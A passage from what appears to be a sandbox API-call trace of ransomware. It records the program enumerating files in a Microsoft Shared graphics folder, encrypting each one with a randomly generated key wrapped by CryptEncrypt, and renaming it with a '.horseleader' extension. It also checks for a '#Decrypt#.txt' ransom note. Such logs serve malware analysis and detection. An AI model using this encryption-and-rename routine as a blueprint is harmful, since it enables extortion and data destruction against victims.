shared\\grphflt\\ms.eps"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps.horseleader")) returned 1 [0228.150] GetProcessHeap () returned 0x780000 [0228.150] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0228.150] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x42d, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MS.GIF", cAlternateFileName="")) returned 1 [0228.150] lstrcmpiW (lpString1="MS.GIF", lpString2="Windows") returned -1 [0228.150] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 65 [0228.151] StrStrIW (lpFirst="MS.GIF", lpSrch=".horseleader") returned 0x0 [0228.151] lstrcmpW (lpString1="MS.GIF", lpString2="#Decrypt#.txt") returned 1 [0228.151] lstrcmpW (lpString1="MS.GIF", lpString2="_uninstalling_.png") returned 1 [0228.151] lstrlenW (lpString=".testttjffg") returned 11 [0228.151] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF", lpSrch=".testttjffg") returned 0x0 [0228.151] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0228.151] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0228.151] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\GRPHFLT\\MS.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0228.152] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 65 [0228.152] StrStrW (lpFirst="MS.GIF", lpSrch=".txt") returned 0x0 [0228.152] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1069) returned 1 [0228.152] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x42d, lpOverlapped=0x0) returned 1 [0228.178] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffbd3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.178] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x42d, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x42d, lpOverlapped=0x0) returned 1 [0228.178] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.178] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0228.178] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0228.179] CloseHandle (hObject=0x158) returned 1 [0228.179] GetProcessHeap () returned 0x780000 [0228.179] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, 
Size=0x840) returned 0x7db828 [0228.179] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF.horseleader") returned 77 [0228.179] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.gif.horseleader")) returned 1 [0228.180] GetProcessHeap () returned 0x780000 [0228.180] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0228.180] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x425, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MS.JPG", cAlternateFileName="")) returned 1 [0228.180] lstrcmpiW (lpString1="MS.JPG", lpString2="Windows") returned -1 [0228.180] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 65 [0228.180] StrStrIW (lpFirst="MS.JPG", lpSrch=".horseleader") returned 0x0 [0228.180] lstrcmpW (lpString1="MS.JPG", lpString2="#Decrypt#.txt") returned 1 [0228.180] lstrcmpW (lpString1="MS.JPG", lpString2="_uninstalling_.png") returned 1 [0228.180] lstrlenW (lpString=".testttjffg") returned 11 [0228.180] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG", lpSrch=".testttjffg") returned 0x0 
[0228.180] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0228.180] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0228.181] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0228.182] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 65 [0228.182] StrStrW (lpFirst="MS.JPG", lpSrch=".txt") returned 0x0 [0228.182] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1061) returned 1 [0228.182] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x425, lpOverlapped=0x0) returned 1 [0228.202] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffbdb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.202] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x425, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x425, lpOverlapped=0x0) returned 1 [0228.202] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.202] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0228.202] 
WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0228.202] CloseHandle (hObject=0x158) returned 1 [0228.203] GetProcessHeap () returned 0x780000 [0228.203] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0228.203] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG.horseleader") returned 77 [0228.203] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg.horseleader")) returned 1 [0228.204] GetProcessHeap () returned 0x780000 [0228.204] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0228.204] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x692, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MS.PNG", cAlternateFileName="")) returned 1 [0228.204] lstrcmpiW (lpString1="MS.PNG", lpString2="Windows") returned -1 [0228.204] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 65 [0228.204] StrStrIW (lpFirst="MS.PNG", 
lpSrch=".horseleader") returned 0x0 [0228.204] lstrcmpW (lpString1="MS.PNG", lpString2="#Decrypt#.txt") returned 1 [0228.204] lstrcmpW (lpString1="MS.PNG", lpString2="_uninstalling_.png") returned 1 [0228.204] lstrlenW (lpString=".testttjffg") returned 11 [0228.204] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG", lpSrch=".testttjffg") returned 0x0 [0228.204] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0228.204] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0228.204] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0228.205] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 65 [0228.205] StrStrW (lpFirst="MS.PNG", lpSrch=".txt") returned 0x0 [0228.205] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1682) returned 1 [0228.205] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x692, lpOverlapped=0x0) returned 1 [0228.238] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff96e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.238] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x692, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x692, lpOverlapped=0x0) returned 1 
[0228.238] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.238] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0228.238] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0228.238] CloseHandle (hObject=0x158) returned 1 [0228.239] GetProcessHeap () returned 0x780000 [0228.239] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0228.239] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG.horseleader") returned 77 [0228.239] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png.horseleader")) returned 1 [0228.240] GetProcessHeap () returned 0x780000 [0228.240] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0228.240] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x566, dwReserved0=0xfb834915, 
dwReserved1=0xd3dda4fd, cFileName="MS.WPG", cAlternateFileName="")) returned 1 [0228.240] lstrcmpiW (lpString1="MS.WPG", lpString2="Windows") returned -1 [0228.240] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 65 [0228.240] StrStrIW (lpFirst="MS.WPG", lpSrch=".horseleader") returned 0x0 [0228.240] lstrcmpW (lpString1="MS.WPG", lpString2="#Decrypt#.txt") returned 1 [0228.240] lstrcmpW (lpString1="MS.WPG", lpString2="_uninstalling_.png") returned 1 [0228.240] lstrlenW (lpString=".testttjffg") returned 11 [0228.240] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG", lpSrch=".testttjffg") returned 0x0 [0228.240] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0228.240] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0228.241] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.wpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0228.241] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 65 [0228.241] StrStrW (lpFirst="MS.WPG", lpSrch=".txt") returned 0x0 [0228.241] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1382) returned 1 [0228.241] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x566, lpOverlapped=0x0) returned 1 [0228.253] SetFilePointerEx (in: 
hFile=0x158, liDistanceToMove=0xfffffa9a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.253] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x566, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x566, lpOverlapped=0x0) returned 1 [0228.254] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.254] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0228.254] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0228.254] CloseHandle (hObject=0x158) returned 1 [0228.255] GetProcessHeap () returned 0x780000 [0228.255] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0228.255] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG.horseleader") returned 77 [0228.255] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.wpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.wpg.horseleader")) returned 1 [0228.256] GetProcessHeap () returned 0x780000 [0228.256] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0228.256] FindNextFileW (in: hFindFile=0x7c6860, 
lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8a19600, ftCreationTime.dwHighDateTime=0x1caa4ff, ftLastAccessTime.dwLowDateTime=0xeefe5e10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8a19600, ftLastWriteTime.dwHighDateTime=0x1caa4ff, nFileSizeHigh=0x0, nFileSizeLow=0x11d78, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="PICTIM32.FLT", cAlternateFileName="")) returned 1 [0228.256] lstrcmpiW (lpString1="PICTIM32.FLT", lpString2="Windows") returned -1 [0228.256] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 71 [0228.256] StrStrIW (lpFirst="PICTIM32.FLT", lpSrch=".horseleader") returned 0x0 [0228.256] lstrcmpW (lpString1="PICTIM32.FLT", lpString2="#Decrypt#.txt") returned 1 [0228.256] lstrcmpW (lpString1="PICTIM32.FLT", lpString2="_uninstalling_.png") returned 1 [0228.256] lstrlenW (lpString=".testttjffg") returned 11 [0228.257] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT", lpSrch=".testttjffg") returned 0x0 [0228.257] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0228.257] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0228.257] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\pictim32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0228.258] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\GRPHFLT\\PICTIM32.FLT") returned 71 [0228.258] StrStrW (lpFirst="PICTIM32.FLT", lpSrch=".txt") returned 0x0 [0228.258] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=73080) returned 1 [0228.258] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.259] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.295] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.295] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.296] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x66bc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.296] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.300] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.300] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.300] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xcd78, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.300] ReadFile (in: hFile=0x158, 
lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.306] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.306] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.307] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.307] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0228.307] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0228.307] CloseHandle (hObject=0x158) returned 1 [0228.307] GetProcessHeap () returned 0x780000 [0228.307] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0228.308] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT.horseleader") returned 83 [0228.308] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\pictim32.flt"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT.horseleader" (normalized: "c:\\program files\\common files\\microsoft 
shared\\grphflt\\pictim32.flt.horseleader")) returned 1 [0228.309] GetProcessHeap () returned 0x780000 [0228.309] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0228.309] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8a19600, ftCreationTime.dwHighDateTime=0x1caa4ff, ftLastAccessTime.dwLowDateTime=0xeefe5e10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8a19600, ftLastWriteTime.dwHighDateTime=0x1caa4ff, nFileSizeHigh=0x0, nFileSizeLow=0x49f80, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="PNG32.FLT", cAlternateFileName="")) returned 1 [0228.309] lstrcmpiW (lpString1="PNG32.FLT", lpString2="Windows") returned -1 [0228.309] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common 